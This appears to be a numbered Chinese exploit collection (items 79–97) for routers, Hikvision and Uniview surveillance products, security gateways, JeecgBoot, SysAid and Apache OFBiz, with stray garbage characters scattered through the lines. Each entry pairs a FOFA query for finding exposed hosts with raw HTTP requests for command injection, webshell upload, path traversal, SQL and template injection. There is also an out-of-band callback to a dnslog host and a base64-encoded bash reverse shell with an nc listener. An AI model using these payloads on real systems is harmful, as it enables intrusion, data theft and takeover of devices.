7 }" A2 |4 }7 GAccept-Encoding: gzip/ v* T* n5 j5 M0 {! d
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
2 w  W! G. s* U5 v& Z
3 b' u& j- ~' L------YsOxWxSvj1KyZow1PTsh98fdu6l
( x; ]) \) ~7 o) DContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt", ]  F  u7 S0 x: T1 I
Content-Type: image/png% R% o7 ?' {7 F! `8 I  m) h
  W  c, l$ z2 L1 c* L5 a
YsOxWxSvj1KyZow1PTsh98fdu6l+ v% x5 M3 A! }( |& L7 `3 ~
------YsOxWxSvj1KyZow1PTsh98fdu6l" \1 P9 {1 Y3 }! h1 O
Content-Disposition: form-data; name="target"
: c2 I  _# D$ r! H
2 }: Q  G# |  ^/Applications/SkillDevelopAndEHS/
3 @, O: K# g, _# G9 u9 q- `# R------YsOxWxSvj1KyZow1PTsh98fdu6l--+ {9 ]8 e& ]% K# R3 }' h
! l/ _! @) ?- J

# V* D, j8 X# \4 ]$ C6 A' |! ^GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.15 J6 A+ X' c5 T1 x1 h! y
Host: x.x.x.x
# ^# }; `# l3 N" b) x0 [1 m( }' R9 ~" F) ~( v( r. V* E

' m5 ?, j2 T: r79. BYTEVALUE 百为流控路由器远程命令执行3 j  }; q& `) X
FOFA:BYTEVALUE 智能流控路由器
5 Z" v2 `' v8 B. ?+ o; aGET /goform/webRead/open/?path=|id HTTP/1.1
3 w7 q$ z' J& R) }* W- FHost:IP9 r) w- J' X  I% r! T& J: g  W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.06 n& @; l* R0 ~* h3 K
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8+ \9 i$ ^% y7 J3 i4 t, ]4 d  j* D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" t+ J5 L0 P: ?
Accept-Encoding: gzip, deflate
3 w/ w; w7 O  ?* N( T# D' P: TConnection: close% s& B# d4 f% H+ ^! ^+ C2 j4 b
Upgrade-Insecure-Requests: 1: J/ _9 F3 Y2 m3 w! x5 L
- d6 L3 \& k- I4 m: O6 a
6 X0 f1 C6 G) A; E$ h
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传! B$ o% |( q8 ^% D6 q
FOFA:app="速达软件-公司产品"
; L$ N% f* u' K! q3 {$ @( w; n3 kPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
: ]% R5 e! ^6 LHost: x.x.x.x
9 \- ?) m( [1 eUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) V- s/ a0 c6 G+ [) T6 N
Content-Length: 27
0 a0 W) J; O* }' KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) N. s% T0 w+ O1 f& ^# |$ T
Accept-Encoding: gzip, deflate
5 A8 e" j; q3 I* R5 uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2' I" s  @6 r) {4 J
Connection: close
6 S9 y# B  A" N, gContent-Type: application/octet-stream
% ?3 u% n& P) t9 N3 K5 ]Upgrade-Insecure-Requests: 1
" D* J7 E$ ]0 G1 f. U0 M9 S, A) ~& B3 L0 R
<% out.print("oessqeonylzaf");%>5 c* a% u, B6 r* }+ r+ v9 b! P

* }; j& @0 W3 X  Q- ^: s- {! e( B4 u) K0 A$ O
GET /xykqmfxpoas.jsp HTTP/1.1: h( f* k" M( Y  x- ~/ H. S4 J) _* s
Host: x.x.x.x' `% B7 w( C5 z9 [" z  X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15  n  p* n: b, s# a
Connection: close2 B: E+ h$ T8 f* t8 V6 S/ d) @& i
Accept-Encoding: gzip; m5 d  m1 a8 [* [( p/ c( b
9 e$ L7 m, W& j

$ f" J8 B6 [5 f3 W6 l1 p81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露, C$ P7 _. v7 ?$ `2 D% B. N) Z3 a
FOFA:app="uniview-视频监控"7 Z" N9 _5 z7 I
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1* I4 a: K" L; ^6 p+ k
Host: x.x.x.x
% n+ r6 O* z+ i7 P2 OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15) \8 N* u# z2 V! v+ c* R
Connection: close
- W0 }  s2 A- _Accept-Encoding: gzip8 ]2 ]4 V/ G; ~4 Y. v6 D& s
: X7 ]; q3 y. T( t0 u
6 h' u+ C' A2 S8 `3 Z7 a
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
) E. P! w' O. ^5 `4 b' @1 ~6 P. L! VFOFA:app="思福迪-LOGBASE"0 O+ c0 I2 X! `' l! R" u( f
POST /bhost/test_qrcode_b HTTP/1.1. C  K2 |% }" d- Z3 l! b
Host: BaseURL
) h, z1 R4 h3 p) PUser-Agent: Go-http-client/1.1+ Y) f2 D9 n! D( a
Content-Length: 23# v, |* s% o3 E4 r
Accept-Encoding: gzip( Z9 L! x# e$ `
Connection: close% |! ~) p3 {! W7 e, C8 c
Content-Type: application/x-www-form-urlencoded
) E" q8 X* F( `' UReferer: BaseURL
$ V3 u: N- A9 ]4 D/ F9 Z
. M& F& M2 N7 O2 E! \z1=1&z2="|id;"&z3=bhost2 @/ U6 {- \1 |# ]3 M
) ~8 c) h4 {9 y
& U! A! B) h: Q% v& B
83. JeecgBoot testConnection 远程命令执行* ?5 f8 _+ A$ D( r+ U
FOFA:title=="JeecgBoot 企业级低代码平台"
$ }& ]+ g4 k8 v- X. V/ L, P
) G) q/ O; x; o( j
* s2 D: v, Z: p3 g9 V7 XPOST /jmreport/testConnection HTTP/1.1
( W. w% f, O+ f+ q! z, a' v+ s  oHost: x.x.x.x1 Y) d4 H+ l% c' a9 o) w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
. Q" A! @6 E% O: v4 `Connection: close
* d9 T# h4 R1 r( o$ lContent-Length: 8881* B4 [/ A2 J7 o: f0 b/ i0 G. n
Accept-Encoding: gzip
7 o  l% h1 R" X1 t' ?Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"  v. N% D# H! L0 T( Y' z
Content-Type: application/json
0 ^3 ?( y, ?* V3 T- u# d7 e$ Q) P0 z8 Z: T
PAYLOAD" ^: C& Y1 D2 S0 o0 ]

- V6 A/ P1 _9 _: W* S. F84. Jeecg-Boot JimuReport queryFieldBySql 模板注入$ z' E# `) A: e% j; n% }
FOFA:title=="JeecgBoot 企业级低代码平台"' c7 q2 t; n3 m
# r0 r& n% F9 F) v# |. {# z
0 y& v* O1 ^" j& D) w) s

* [1 U" k9 E; c6 Y/ BPOST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.12 S: q$ d) B% t- `6 ^0 F) x
Host: 192.168.40.130:80805 q) ^7 q/ {8 J; D9 ~  U" I7 b
User-Agent: curl/7.88.1
+ N* c& P* l: R4 G" a8 }7 P2 BContent-Length: 156
' V, x1 q: b! J6 XAccept: */*- ]$ r& i; D1 I/ E) U# L
Connection: close
3 o/ e& `+ ?+ a* j% ~Content-Type: application/json
& Q6 r) n7 b* O5 T: \, LAccept-Encoding: gzip
& B0 Q2 V" H! Q) Y: F* A9 l6 B3 M) _  X! Z6 v+ n# ?' C9 b; @
{
1 l8 m2 P8 s0 ?& O6 j3 ~  o0 ^ "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
8 P3 P, X$ a/ S  "type": "0"
# C& c0 s* T: X; H}
' {" N5 e3 j( k2 p9 G. f! K) ~! u: d! N  u3 G! [/ O$ ?: h

. d! z0 ^* d" ~! L1 Y6 I4 y85. SysAid On-premise< 23.3.36远程代码执行0 s: s6 j3 [' ?5 k. [% K) c6 i9 u
CVE-2023-47246, a  H+ V7 ^( G6 w4 A/ m3 d8 r
FOFA:body="sysaid-logo-dark-green.png"
% O( [: b7 x8 B; b+ \* p3 |EXP数据包如下,注入哥斯拉马
; {3 |0 b: g/ KPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
3 B9 G( m# z% qHost: x.x.x.x
1 b; U! a2 @. w  }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15# }/ A$ o' k& ?. f! {6 E. \
Content-Type: application/octet-stream; o  U( j7 l$ ~3 E0 ^- p
Accept-Encoding: gzip
- t. S5 I( w& D4 r$ b5 g2 y0 r" o2 a& _1 d. f
PAYLOAD! ^3 _! {# Z9 k. r# Y8 q1 g

4 i& H* s, e# e- {回显URL:http://x.x.x.x/userfiles/index.jsp) S$ a+ S0 N7 X1 [, Z
- u: H* g. B( J. t' |# w& l
86. 日本tosei自助洗衣机RCE- w* x- }+ L! y( l6 B7 Z
FOFA:body="tosei_login_check.php"% i9 o& n: g; R9 f, |+ `7 t
POST /cgi-bin/network_test.php HTTP/1.1' Y& f0 P- r' L# T( l( q  E
Host: x.x.x.x
$ `' w. J2 B4 Z# U2 u0 H( v( }User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36/ X( o4 l8 E& s  ?
Connection: close
6 C7 H3 Y+ Z4 D8 p  i7 bContent-Length: 44
  F9 a' x8 J& ]7 oAccept: */*
6 h! x( u! p& x: jAccept-Encoding: gzip
0 y3 J3 v6 U( m7 }& Z/ k. \Accept-Language: en3 C/ d) k0 ]* Z1 q- P) ]
Content-Type: application/x-www-form-urlencoded
) _- H6 `% K' g% f. I( E
) c4 m: D$ n; J( @2 Y; ~6 q& rhost=%0acat${IFS}/etc/passwd%0a&command=ping
$ @9 y7 p4 c, t, D* P
& E9 n. P* X" w$ `7 g$ s3 ~% N! H( a+ c
87. 安恒明御安全网关aaa_local_web_preview文件上传; @8 f1 w" l. i3 b: S5 E# A3 E
FOFA:title="明御安全网关"8 w4 P/ [4 E* Q7 j: r
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.19 s: B. [: T. j4 A
Host: X.X.X.X" R* [0 d' x+ m$ X) h: H
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15  G$ v. }9 ^& k2 @$ P. q6 O) b6 W
Connection: close
' E6 ~1 H0 d7 o5 g% K4 N. gContent-Length: 198
$ n6 @) a. f: Z  _8 kAccept-Encoding: gzip
( ?6 R* p2 j1 iContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
2 w; n1 x/ h, p/ C: O) ]6 U+ |
& w/ }& O( n; P/ E--qqobiandqgawlxodfiisporjwravxtvd/ ]; x' |; A4 r3 i- d5 o; _  A* J
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"* {+ A6 o; v5 u, s1 U% V
Content-Type: text/plain
5 Q8 Z5 f) B; p: p% L# i8 o8 ~5 K0 W0 Y( \3 l0 m" L
2ZqGNnsjzzU2GBBPyd8AIA7QlDq
: T4 A1 M9 L& D2 o( f5 y0 E--qqobiandqgawlxodfiisporjwravxtvd--
! k) S; }7 M! g" @  w
9 Y8 E. Q, G* f& N  P2 r
  |8 u- i! u4 u( a4 D6 [/jfhatuwe.php, H: u3 [" V% q/ `* H. P2 p/ h
: \" y; z3 G2 j5 x- Q% v
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
8 a; x) y4 Q9 C! C2 ^2 sFOFA:title="明御安全网关". {5 b5 V4 ]7 t3 L* P2 g7 D
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
, H3 K5 z/ k4 BHost: x.x.x.xx.x.x.x- k/ [  L6 x' v; y. C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
% V# B+ B  I0 v9 K; |- hAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. k1 O- m# c. G+ AAccept-Encoding: gzip, deflate9 D; \3 _4 K2 s4 @/ L  ^$ }
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 }" J. L6 W5 iConnection: close
" Q- j* Y; y: d+ p; n2 e8 f/ j$ d4 k; z) o5 q& _
- ~+ S9 R3 u7 G
/astdfkhl.php
+ _5 {9 s3 W# v& }2 U
# |3 S- w; p, S89. 致远互联FE协作办公平台editflow_manager存在sql注入$ ]1 y  v$ C7 R0 ]) s8 d- K
FOFA:title="FE协作办公平台" || body="li_plugins_download"
1 p6 x% m4 G5 T9 q7 v; w1 kPOST /sysform/003/editflow_manager.js%70 HTTP/1.1
2 z" y& K4 z/ h; t0 [6 {5 E/ SHost: x.x.x.x
: `5 q0 m' l7 K$ A1 J0 @4 t! mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
# L8 J0 m/ e7 U- [1 Z0 N4 I* jConnection: close
$ i) t- N3 w7 ^7 BContent-Length: 412 [  b" f" b) w! d
Content-Type: application/x-www-form-urlencoded" A- L! A. f8 ?1 x& l6 n
Accept-Encoding: gzip! }% V0 R: U8 S
, z/ C* E) P  w( n' ~/ D
option=2&GUID=-1'+union+select+111*222--+9 `) O) j/ `+ n* J2 L" y
- r7 l8 s6 J, D  z# i" S' o( S
! N' j0 Q' ~, i
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行* D/ _! f& j6 d0 K. x8 c
FOFA:icon_hash="-1830859634"
5 o- D& Z0 L. V* Z  v. \: zPOST /php/ping.php HTTP/1.1! ^; w/ r. s. O* Z% M3 A7 Y, R0 V
Host: x.x.x.x) R5 F/ E$ S0 S4 X& y( N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0; f$ ^! q9 S7 f
Content-Length: 51) A4 ^3 n( y% N! |' {+ W2 _
Accept: application/json, text/javascript, */*; q=0.01
3 W$ M' e( U! q" IAccept-Encoding: gzip, deflate) E9 B4 l) B3 j2 l( L2 [0 a
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 b) M, E; v  m& a- R3 bConnection: close$ s* P" a7 O1 m6 s5 o: u
Content-Type: application/x-www-form-urlencoded
: q* d- k( s6 o0 m" fX-Requested-With: XMLHttpRequest5 A0 `# d4 Y7 e9 {& n6 o7 L
2 L3 \) B$ s" q6 e
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig
& I1 N! ]) _% o/ j8 L& f9 _2 ]- V$ z! {6 G2 U
1 K" [7 ], h& e5 t, ^
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
" U# e/ N' O# [( SFOFA:title="综合安防管理平台"0 j. O; s2 o9 r  [& B: l8 K
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
1 a& T  P8 M2 i! v& pHost: your-ip
; l! E' }8 o7 z3 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
) ~+ q4 v8 w+ D* W" K0 bAccept-Encoding: gzip, deflate, F. B4 C; O$ ^0 a
Accept: */*) v6 j# d3 r3 p- Z2 Y" V+ j% N
Connection: keep-alive+ A! C+ T5 ^! j! J, E8 I, U1 ]

! X& w8 x) a, X! N
! B7 D3 p3 B( f  `9 t' D) {4 Q$ ?. E+ c. q6 i
92. 海康威视运行管理中心session命令执行! b4 P  S9 d/ P6 ], p; G
Fastjson命令执行
: H% D4 I# l/ C3 N/ T7 U* Rhunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
& G0 |" u& w2 h- T6 O% n3 J8 ZPOST /center/api/session HTTP/1.1
2 ?$ G0 J6 c% Y" L! m; T' ?$ RHost:: s8 O3 E$ v- Z- [( z. W
Accept: application/json, text/plain, */*
; |4 n% y! T, d- [! m- ^6 L% JAccept-Encoding: gzip, deflate
5 n  q+ m, o! o, @6 V9 pX-Requested-With: XMLHttpRequest; r5 Q7 F, l  i
Content-Type: application/json;charset=UTF-80 Y+ a. X1 t0 M; ^, B' }+ [
X-Language-Type: zh_CN' t4 [' q9 J* n: Y( A9 N
Testcmd: echo test
, `. M' B; G8 y2 ?8 i5 nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.368 l, H  C" ~1 j2 ]6 U
Accept-Language: zh-CN,zh;q=0.9
! |* ~2 P2 _8 y: w6 X5 sContent-Length: 5778! U! V2 w6 _8 W# a' ^& `! v
- Z! B  ^+ ?2 h) k
PAYLOAD
8 T: B) a; u. `4 w; y- L; ~
. H. @8 |+ n  G! S  ]' D( s
! o6 `& p8 X5 n93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
- S- b8 f6 o9 y7 N( ?FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="  _( p2 o! I( v& g1 O& a# p1 F
POST /?g=app_av_import_save HTTP/1.11 O. L0 }& u) d. |, j
Host: x.x.x.x' Z, x5 V. S- F/ i$ U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx3 n  p1 _8 p. M0 G/ B& d
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
0 k9 O3 X: n' c* X& G8 r: j8 h0 e/ f  }, f4 Z. \
------WebKitFormBoundarykcbkgdfx
6 y/ J* q0 j8 T4 M6 M1 s' mContent-Disposition: form-data; name="MAX_FILE_SIZE"/ l4 D2 S  T9 r( f( W6 g
2 J5 u2 U6 c. |. P" }0 }' c
10000000) ?3 k) g2 s7 V. c
------WebKitFormBoundarykcbkgdfx
3 |5 {& P9 L7 P4 WContent-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
8 Q& c+ ]5 o, d, UContent-Type: text/plain6 R& h# g/ C7 h% U6 v7 b- `

4 S( {; ]7 P. |0 k8 a. Uwagletqrkwrddkthtulxsqrphulnknxa* Y& R  P( Q/ c+ K  V
------WebKitFormBoundarykcbkgdfx2 z; ]- I/ Y3 U
Content-Disposition: form-data; name="submit_post"
2 r) `! i! J- H: t( p6 K5 I
4 s7 V' Q3 T' h( C/ O" }( D( \obj_app_upfile4 Y* p$ W/ g! S8 T* H
------WebKitFormBoundarykcbkgdfx
4 V% K) B( ]$ a+ S5 \* uContent-Disposition: form-data; name="__hash__"
) Z" ]8 X3 @9 d$ s7 [. \3 z
  j( y* U+ E3 X8 j0 |0b9d6b1ab7479ab69d9f71b05e0e9445# h; H, x. u) i) l. E
------WebKitFormBoundarykcbkgdfx--# {/ B: P+ u; p9 m1 h7 d: u

# |5 ~6 H0 P+ ~; v  Z; c) @; d  f% y! [+ X2 X
GET /attachements/xlskxknxa.txt HTTP/1.1
+ i3 C2 B$ s( H5 B, @Host: xx.xx.xx.xx
, W. b5 B& x+ t" \- oUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
' n6 s- B$ b. `1 R# p0 v3 L5 r6 E2 n% V1 ^
; u1 C' G+ Q* x2 T3 O" P$ ~
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
7 X% @, G5 G+ }/ m2 V& j& r4 dFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="8 W* v# d- ^2 M; r% O
POST /?g=obj_area_import_save HTTP/1.1
9 A) O( h% u' m" cHost: x.x.x.x; Q. Y6 L8 g+ ?; ~: a8 S! R
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt+ g8 _1 y4 K. i' A
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
( S  ~! W9 Q& E( v6 t0 \* w& U# }' R7 e( W/ h
------WebKitFormBoundarybqvzqvmt1 K& L0 _5 x  ]
Content-Disposition: form-data; name="MAX_FILE_SIZE"
7 J' W- c* z) S/ t1 q: |, n9 d  P; Z1 ?
10000000
& k! k7 \2 ?% d$ t% t/ |9 h------WebKitFormBoundarybqvzqvmt
- I0 ]: G/ b) h8 TContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
8 a/ \5 p# Z( S+ k4 @Content-Type: text/plain0 a* F( i6 h: A) s
6 B: P: o: K  p) v' h. S2 ^) T
pxplitttsrjnyoafavcajwkvhxindhmu
5 D" t" S; }9 a- h/ r4 a------WebKitFormBoundarybqvzqvmt
+ O0 O, o! V% Q' hContent-Disposition: form-data; name="submit_post"
  g+ f" u/ Y) H! J  [# M5 s1 o# U& d0 h+ N4 \6 \* c
obj_app_upfile
3 F& r% ]! y8 K, y$ N------WebKitFormBoundarybqvzqvmt
) D3 ?. q& N% D+ [# s6 f7 @Content-Disposition: form-data; name="__hash__"' C1 O9 s  W8 C' A! K. C
' @, m* \6 ^, s8 _+ B" b/ _
0b9d6b1ab7479ab69d9f71b05e0e9445
4 F8 v- O/ r5 d------WebKitFormBoundarybqvzqvmt--
# `) X& q$ Z0 {& T& {5 E& a! t. `! G  g$ n, e5 e
/ u! O* a2 ~" z5 v6 J( ^

$ t5 _1 R/ T0 H/ rGET /attachements/xlskxknxa.txt HTTP/1.1
6 r4 L" Q) U+ ], u" aHost: xx.xx.xx.xx
1 z: t4 O; N# L: y/ z/ l  gUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
) _2 t! b' y2 J2 ~4 a' j! S
  l' i3 R8 C2 x% [6 S* W; X7 a5 l- _
' v" X4 k2 f* K& J: O2 x0 ^+ z# i, t& C# f. }
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行; G$ @3 }- `" n& Z% s
CVE-2023-49070  v3 G4 @% O7 i5 c
FOFA:app="Apache_OFBiz"
1 h3 u! o5 G$ k: w2 S& k( K( BPOST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1( N0 o" [3 y' P$ X
Host: x.x.x.x
/ Q3 f  Q, b* }% W5 t1 r4 B6 hUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
7 l! F% m4 Y6 P0 ?( H* ~Connection: close
% ]" c- _7 K7 k, Z; sContent-Length: 889- r. u) C$ z7 b  C
Content-Type: application/xml
9 [% y5 |; d: z8 C9 P# i5 h8 uAccept-Encoding: gzip% i! ]7 r( a) u4 j6 G8 ?) {
. I0 M& x; p2 K' t- ^% A/ P
<?xml version="1.0"?>
3 i- R7 V, ^$ [<methodCall>, E; K/ {' L  V' V, t7 W4 O
   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>; A2 c  p+ R8 e# ?: ^0 A
    <params>& h7 |$ S5 R+ I: C. n; h
      <param>
8 p- A# j% E. _! s2 \- w* d& X& w      <value>" t: f4 G6 H5 D& M- i: Y* V
        <struct>
* y& V% J, ~. r# N* K7 T) M* R, m! d  K       <member>4 y, \9 `) f- `! d2 ^( p" G
          <name>test</name>
$ c3 C- n; y, `2 v: q. q4 L          <value>
  M# Y$ @" A: u- u      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable># H; X. n0 ]. ^" n# r9 a
          </value>) m6 B# ~" D; u  s1 o
        </member>
# K6 i. ?; w+ f3 s8 Z9 b      </struct>$ V4 s# x( p* Z# w
      </value>
0 p" N- v7 @% _! F    </param>
* ^& n8 [) |9 W& }/ c    </params>+ x& U% |4 Q2 U& ]7 y$ D% c+ x
</methodCall>
: t& ?) n9 M0 N/ W" J0 V8 U& V
! W* x3 [$ a$ u# S% R3 C1 H+ r9 F3 [0 \, x0 t1 `& ^! j
用ysoserial生成payload
. w* a+ p) J6 k8 @! d' D/ |1 Fjava -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n", X8 [3 M' W9 r" X7 Q4 o
5 P' r& Z% {  z- i: x( V

8 p# W# \/ J: j4 R  \9 d将生成的payload替换到上面的POC! g1 v" g+ r. b
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
% K% z0 j8 v2 m, {6 j8 QHost: 192.168.40.130:84436 C8 r! @0 P3 C2 h- r! t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
4 v; O8 v# c- E" D% I0 oConnection: close6 F$ L4 @5 D5 `, x9 X; T
Content-Length: 889# R1 c0 Z7 l- @2 e
Content-Type: application/xml5 H5 \; [* U/ M/ \9 ]5 ]
Accept-Encoding: gzip
1 s0 b4 [$ ?  \8 p! q! _* W8 ~3 y! Z! {) w" B* V; z; C0 f
PAYLOAD
' _7 S* a3 _. O9 m
1 Z. ^% h! _" x! \. F* r5 ]5 x4 ]96. Apache OFBiz  18.12.11 groovy 远程代码执行
5 F& x- D/ F3 _! h: d* Z; n6 x$ dFOFA:app="Apache_OFBiz"
5 N/ x1 U/ Q; q. r+ J. nPOST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
$ [" i" N! Y: C) IHost: localhost:8443
. I" O/ p) {3 k& aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.04 R/ B9 d6 v1 v3 c$ s$ a, ?% c
Accept: */*
* m5 w# E) l: MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
# Q$ w/ O0 \8 k$ lContent-Type: application/x-www-form-urlencoded
+ I3 r' ]; d6 w. k5 BContent-Length: 559 C0 B8 C2 y3 {% H& Z
, K$ u' E* K4 _- g* z
groovyProgram=throw+new+Exception('id'.execute().text);; p' |( Q6 S! q& y) P% |" w
/ z0 O2 I, X; {3 p' T4 U; k, N8 D0 ?( J
: O8 Q/ X- j, N+ z: \! g
反弹shell- l0 O" g7 p& r  X9 B
在kali上启动一个监听7 f: e! e8 [. ?
nc -lvp 77770 A+ g5 R  `) E0 K9 S
$ O( b& S6 J# I" y$ t) \2 u6 q
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1; \* G* J2 }! A* g# M4 E
Host: 192.168.40.130:8443
: ^' a( B' m  Z) vUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0! j+ J+ L  `- W1 A8 N
Accept: */** m6 m$ `- O0 S* x4 Z/ I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 c' s# F$ `8 v2 B" y4 I) y
Content-Type: application/x-www-form-urlencoded# N& T9 i$ `: f0 X' Z
Content-Length: 71
" g5 z- W1 j! S: w* w" w, P3 W
$ j/ F& |0 E% ggroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();
3 ^* k' Y/ j3 Y8 W; @8 D
; [) l7 ?- x' F1 \97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行) T( t6 t2 U7 z3 }+ F
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"3 Y+ _9 Q( \/ k. G2 G
GET /passport/login/ HTTP/1.1
4 b% h5 m7 C! J& M1 ~Host: 192.168.40.130:8085! C- A' {# m5 h& B
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 u8 S4 t8 c# L& N! d
Accept-Encoding: gzip( e6 a  R- c# W
Connection: close
) c; F. Z# P) j. E5 X, tCookie: rememberMe=PAYLOAD
